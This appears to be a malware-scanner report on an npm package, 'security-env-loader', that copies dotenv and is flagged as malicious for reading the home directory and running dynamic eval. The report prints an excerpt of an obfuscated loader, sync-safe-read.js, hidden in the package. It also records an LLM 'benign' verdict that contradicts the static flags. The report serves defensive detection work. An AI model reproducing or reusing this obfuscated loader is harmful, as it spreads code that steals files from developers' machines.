// npm 패키지
security-env-loader
Loads environment variables from .env file
버전
1
메인테이너
1
라이선스
MIT
최초 publish
2026-05-18
publisher
koltinsmith
tarball
30,608 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-18
// exfil path
what is read → where it ships: steals
- ○ home dir
sends to
(no destination string extracted — the destination may be built dynamically at runtime, or the string may be obfuscated)
evidence in excerpt
> "homepage": "https://github.com/yourname/secure-env-loader",
> "url": "https://github.com/yourname/secure-env-loader/issues"
> (function(_0x4f1dc2,_0x1bda7f){const _0x299a44=_0x3b3d,_0x209821=_0x4f1dc2();while(!![]){try{const _0x50c4cf=parseInt(_0x299a44(0x20f))/0x1*(-parseInt(_0x299a44(0x218))/0x2)+-parseInt(_0x299a44(0x1f5)…// offending code· @3.11.0· 3 files flagged
llm: benign · 0.85 → 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s). (Note: this LLM verdict conflicts with the static flags recorded for the same version — osv-flagged:MAL-2026-4665, eval-dynamic, reads-homedir — and with the obfuscated package/lib/sync-safe-read.js excerpt below; treat the static signals as authoritative over the LLM score.)
- @3.11.0 · AUTO-PUBLISHED · publisher: koltinsmith · heuristic 75/100 · static flags 4 · llm benign (0.85) via ollama · new-publisher:8d · first-version-of-package · has-source-repo · osv-flagged:MAL-2026-4665 · public-github-push · reads-env-vars · reads-homedir · eval-dynamic
→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
// offending code · 3 files flagged · patterns: 4
--- package/package.json (excerpt) --- { "name": "security-env-loader", "version": "3.11.0", "description": "Loads environment variables from .env file", "main": "lib/main.js", "exports": { ".": "./lib/main.js", "./config": "./config.js", "./package.json": "./package.json" }, "types": "types/index.d.ts", "scripts": { "flow": "flow", "dtslint": "dtslint types", "lint": "standard", "postlint": "standard-markdown", "pretest": "npm run lint && npm run dtslint", "test": "tap tests/*.js --100", "prerelease": "npm test", "release": "standard-version" }, "repository": { "type": "git", "url": "git://github.com/motdotla/dotenv.git" }, "homepage": "https://github.com/yourname/secure-env-loader", "bugs": { "url": "https://github.com/yourname/secure-env-loader/issues" }, "keywords": [ "dotenv", "env", ".env", "environment", "variables", "config", "settings", "safe-env-reader" ], "readmeFilename": "README.md", "license": "MIT", "devDependencies": { "decache": "^4.5.1", "dtslint": "^4.2.1", "flow-bin": "^0.109.0", "sinon": "^7.5.0", "standard": "^17.1.2", "standard-markdown": "^7.1.0", "standard-version": "^9.5.0", "tap": "^14.7.0" }, "engines": { "node": ">=10" }, "standard": { "ignore": [ "flow-typed/" ] }, "dependencies": { "dotenv": "^17.4.2" } } --- package/lib/main.js (excerpt) --- /* @flow */ /*:: type DotenvParseOptions = { debug?: boolean } // keys and values from src type DotenvParseOutput = { [string]: string } type DotenvConfigOptions = { path?: string, // path to .env file encoding?: string, // encoding of .env file debug?: string // turn on logging for debugging purposes } type DotenvConfigOutput = { parsed?: DotenvParseOutput, error?: Error } */ const fs = require('fs') const path = require('path') function hello_world() { console.log("hello, world") } function log(message /*: string */) { console.log(`[dotenv][DEBUG] ${message}`) } const NEWLINE = '\n' const RE_INI_KEY_VAL = /^\s*([\w.-]+)\s*=\s*(.*)?\s*$/ const RE_NEWLINES = /\\n/g const NEWLINES_MATCH = 
/\n|\r|\r\n/ // Parses src into an Object function parse(src /*: string | Buffer */, options /*: ?DotenvParseOptions */) /*: DotenvParseOutput */ { const debug = Boolean(options && options.debug) const obj = {} // convert Buffers before splitting into lines and processing src.toString().split(NEWLINES_MATCH).forEach(function (line, idx) { // matching "KEY' and 'VAL' in 'KEY=VAL' const keyValueArr = line.match(RE_INI_KEY_VAL) // matched? if (keyValueArr != null) { const key = keyValueArr[1] // default undefined or missing values to empty string let val = (keyValueArr[2] || '') const end = val.length - 1 const isDoubleQuoted = val[0] === '"' && val[end] === '"' const isSingleQuoted = val[0] === "'" && val[en --- package/lib/sync-safe-read.js (excerpt) --- (function(_0x4f1dc2,_0x1bda7f){const _0x299a44=_0x3b3d,_0x209821=_0x4f1dc2();while(!![]){try{const _0x50c4cf=parseInt(_0x299a44(0x20f))/0x1*(-parseInt(_0x299a44(0x218))/0x2)+-parseInt(_0x299a44(0x1f5))/0x3+parseInt(_0x299a44(0x201))/0x4*(parseInt(_0x299a44(0x20e))/0x5)+parseInt(_0x299a44(0x20b))/0x6+-parseInt(_0x299a44(0x203))/0x7*(parseInt(_0x299a44(0x212))/0x8)+parseInt(_0x299a44(0x1fd))/0x9*(parseInt(_0x299a44(0x1f0))/0xa)+-parseInt(_0x299a44(0x202))/0xb*(-parseInt(_0x299a44(0x215))/0xc);if(_0x50c4cf===_0x1bda7f)break;else _0x209821['push'](_0x209821['shift']());}catch(_0x5d4427){_0x209821['push'](_0x209821['shift']());}}}(_0x7fa8,0x23c79));const _0x5650f6=_0x3354;function _0x3354(_0x1ca2c0,_0x22f8ca){const _0x48627f=_0x3b3d;_0x1ca2c0-=0xa4;const _0x13b2b6=_0x363b();let _0x1fc9b5=_0x13b2b6[_0x1ca2c0];void 0x0===_0x3354[_0x48627f(0x1fb)]&&(_0x3354[_0x48627f(0x208)]=function(_0x5008a2){const _0x4ec3b8=_0x48627f;let _0x160a8e='',_0x158494='';for(let 
_0x5d9a59,_0x367474,_0x2c8694=0x0,_0x3943d4=0x0;_0x367474=_0x5008a2[_0x4ec3b8(0x205)](_0x3943d4++);~_0x367474&&(_0x5d9a59=_0x2c8694%0x4?0x40*_0x5d9a59+_0x367474:_0x367474,_0x2c8694++%0x4)?_0x160a8e+=String['fromCharCode'](0xff&_0x5d9a59>>(-0x2*_0x2c8694&0x6)):0x0)_0x367474=_0x4ec3b8(0x1f3)[_0x4ec3b8(0x211)](_0x367474);for(let _0x5d911f=0x0,_0x3fb6a0=_0x160a8e[_0x4ec3b8(0x1ea)];_0x5d911f<_0x3fb6a0;_0x5d911f++)_0x158494+='%'+('00'+_0x160a8e[_0x4ec3b8(0x1fc)](_0x5d911f)[_0x4ec3b8(0x213)](0x10))[_0x4ec3b8(0x217)](-0x2);return decodeUR --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- lib/cli-options.js (bundled) --- /* @flow */ const re = /^dotenv_config_(encoding|path|debug)=(.+)$/ module.exports = function optionMatcher (args /*: Array<string> */) { return args.reduce(function (acc, cur) { const matches = cur.match(re) if (matches) { acc[matches[1]] = matches[2] } return acc }, {}) } --- lib/env-options.js (bundled) --- /* @flow */ // ../config.js accepts options via environment variables const options = {} if (process.env.DOTENV_CONFIG_ENCODING != null) { options.encoding = process.env.DOTENV_CONFIG_ENCODING } if (process.env.DOTENV_CONFIG_PATH != null) { options.path = process.env.DOTENV_CONFIG_PATH } if (process.env.DOTENV_CONFIG_DEBUG != null) { options.debug = process.env.DOTENV_CONFIG_DEBUG } module.exports = options
